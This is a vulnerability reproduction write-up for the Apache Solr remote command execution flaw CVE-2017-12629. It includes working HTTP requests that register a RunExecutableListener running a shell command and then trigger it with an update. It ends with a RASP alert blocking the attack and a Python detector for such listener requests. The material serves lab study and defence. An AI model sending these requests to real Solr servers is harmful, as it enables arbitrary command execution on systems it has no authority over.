# CVE-2017-12629

# Vulnerability overview

Apache Solr is an open-source search server. It is written in Java and built mainly on HTTP and Apache Lucene. Roughly speaking, documents are added to a search collection over HTTP as XML, and the collection is queried over HTTP as well, returning an XML/JSON response. Versions before 7.1.0 carry two disclosed vulnerabilities: an XML External Entity (XXE) vulnerability and a remote command execution (RCE) vulnerability.

# Affected versions

Apache Solr < 7.1

Apache Lucene < 7.1 (many components depend on it, for example Elasticsearch)

# Reproduction environment

# Download Solr

solr 7.0.1

# Start Solr

```shell
bin/solr start
```

This starts Solr in the background listening on port 8983; the start script checks that startup succeeded and prints a status message to the console. The admin console can then be opened in a browser at http://localhost:8983/solr/.

# Create a core

If you are not using the example configuration, you must create a core before you can index and query:

```shell
bin/solr create -c Urahara   # Urahara is the name of the core to create
```

# Add documents

At this point Solr is still empty, so we need to add some documents to index. The subdirectories of example/ contain files of different types.

```shell
bin/post -c Urahara example/exampledocs/*.xml
```

```text
 solr-7.0.1 bin/post -c Urahara example/exampledocs/*.xml
/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Home/bin/java -classpath /Users/xxxx/Downloads/solr-7.0.1/dist/solr-core-7.0.1.jar -Dauto=yes -Dc=Urahara -Ddata=files org.apache.solr.util.SimplePostTool example/exampledocs/gb18030-example.xml example/exampledocs/hd.xml example/exampledocs/ipod_other.xml example/exampledocs/ipod_video.xml example/exampledocs/manufacturers.xml example/exampledocs/mem.xml example/exampledocs/money.xml example/exampledocs/monitor.xml example/exampledocs/monitor2.xml example/exampledocs/mp500.xml example/exampledocs/sd500.xml example/exampledocs/solr.xml example/exampledocs/utf8-example.xml example/exampledocs/vidcard.xml
SimplePostTool version 5.0.0
Posting files to [base] url http://localhost:8983/solr/Urahara/update...
Entering auto mode. File endings considered are xml,json,jsonl,csv,pdf,doc,docx,ppt,pptx,xls,xlsx,odt,odp,ods,ott,otp,ots,rtf,htm,html,txt,log
POSTing file gb18030-example.xml (application/xml) to [base]
POSTing file hd.xml (application/xml) to [base]
POSTing file ipod_other.xml (application/xml) to [base]
POSTing file ipod_video.xml (application/xml) to [base]
POSTing file manufacturers.xml (application/xml) to [base]
POSTing file mem.xml (application/xml) to [base]
POSTing file money.xml (application/xml) to [base]
POSTing file monitor.xml (application/xml) to [base]
POSTing file monitor2.xml (application/xml) to [base]
POSTing file mp500.xml (application/xml) to [base]
POSTing file sd500.xml (application/xml) to [base]
POSTing file solr.xml (application/xml) to [base]
POSTing file utf8-example.xml (application/xml) to [base]
POSTing file vidcard.xml (application/xml) to [base]
14 files indexed.
COMMITting Solr index changes to http://localhost:8983/solr/Urahara/update...
Time spent: 0:00:00.170
```

After these steps Solr has built an index over the documents contained in those files.

# Launching the attack

# Create a listener

First create a listener, where exe is the command we want to run and args are its arguments:

```http
POST /solr/Urahara/config HTTP/1.1
Host: your-ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 158

{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}
```

The key part of the request body:

```json
{
    "add-listener":{
        "event":"postCommit",
        "name":"newlistener",
        "class":"solr.RunExecutableListener",
        "exe":"sh",
        "dir":"/bin/",
        "args":[
            "-c",
            "touch /tmp/success"
        ]
    }
}
```

Send the request above with Postman.


# Update

Then perform an update, which triggers the listener just added:

```http
POST /solr/Urahara/update HTTP/1.1
Host: your-ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 15

[{"id":"test"}]
```

# Result

The file /tmp/success is created successfully.

# RASP protection

With RASP protection enabled, send the request again. This time the request is blocked, so the RASP protection is effective. The alert records the command that was about to run and the stack trace showing it originated from RunExecutableListener's postCommit callback:

```json
{
  "cmdArray":[
    "sh",
    "-c",
    "touch /tmp/success"
  ],
  "stackTrace":[
    "java.lang.ProcessImpl.start(ProcessImpl.java)",
    "java.lang.ProcessBuilder.start(ProcessBuilder.java:1029)",
    "java.lang.Runtime.exec(Runtime.java:621)",
    "org.apache.solr.core.RunExecutableListener.exec(RunExecutableListener.java:98)",
    "org.apache.solr.core.RunExecutableListener.postCommit(RunExecutableListener.java:137)",
    "org.apache.solr.update.UpdateHandler.callPostCommitCallbacks(UpdateHandler.java:99)",
    "org.apache.solr.update.DirectUpdateHandler2.commit(DirectUpdateHandler2.java:686)",
    "org.apache.solr.update.CommitTracker.run(CommitTracker.java:222)",
    "java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)",
    "java.util.concurrent.FutureTask.run(FutureTask.java:266)",
    "java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:180)",
    "java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:293)",
    "java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)",
    "java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)",
    "java.lang.Thread.run(Thread.java:748)"
  ]
}
```

```text
2021-10-11 06:11:44 INFO method: ProcessImpl.start.before, 耗时: 0.270498 ms
```
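As an added defensive example (not part of the original post or of Solr itself), the following Python check covers both the listener-creation request above and the RASP alert: it flags Config API bodies that register a RunExecutableListener, keeping repeated add-listener commands that plain JSON parsing would drop, and it recognises RunExecutableListener frames in a process-start alert. The sample inputs are constructed; the QuerySenderListener entry is an assumed benign warming listener.

```python
import json

# Constructed inputs: PAYLOAD is the add-listener body shown on this page, BENIGN a
# made-up newSearcher warming listener, ALERT an abbreviated RASP alert.
PAYLOAD = ('{"add-listener":{"event":"postCommit","name":"newlistener",'
           '"class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/",'
           '"args":["-c", "touch /tmp/success"]}}')
BENIGN = ('{"add-listener":{"event":"newSearcher","name":"warm",'
          '"class":"solr.QuerySenderListener","queries":[{"q":"*:*"}]}}')
ALERT = ('{"cmdArray":["sh","-c","touch /tmp/success"],"stackTrace":['
         '"java.lang.Runtime.exec(Runtime.java:621)",'
         '"org.apache.solr.core.RunExecutableListener.exec(RunExecutableListener.java:98)"]}')

def _merge_dupes(pairs):
    # The Config API accepts one body with several commands under the same key;
    # plain json.loads keeps only the last, so listener commands are collected.
    out = {}
    for key, value in pairs:
        if key in out and key.endswith("-listener"):
            prev = out[key]
            out[key] = (prev if isinstance(prev, list) else [prev]) + [value]
        else:
            out[key] = value
    return out

def audit_config_request(body):
    """One finding per add-/update-listener whose class is RunExecutableListener."""
    try:
        doc = json.loads(body, object_pairs_hook=_merge_dupes)
    except ValueError:
        return []
    findings = []
    for cmd in ("add-listener", "update-listener"):
        specs = doc.get(cmd, []) if isinstance(doc, dict) else []
        for spec in specs if isinstance(specs, list) else [specs]:
            cls = str(spec.get("class", "")) if isinstance(spec, dict) else ""
            if cls.endswith("RunExecutableListener"):  # "solr." alias or fully qualified
                findings.append("%s %r on %s: exe=%r args=%r" % (
                    cmd, spec.get("name"), spec.get("event"), spec.get("exe"), spec.get("args")))
    return findings

def is_exec_listener_hit(alert):
    """True when a RASP process-start alert's stack passes through the listener."""
    try:
        frames = json.loads(alert).get("stackTrace", [])
    except (ValueError, AttributeError):
        return False
    return any("RunExecutableListener" in frame for frame in frames)
```

The same class check can be run over a core's stored config overlay to find listeners that were registered before monitoring started.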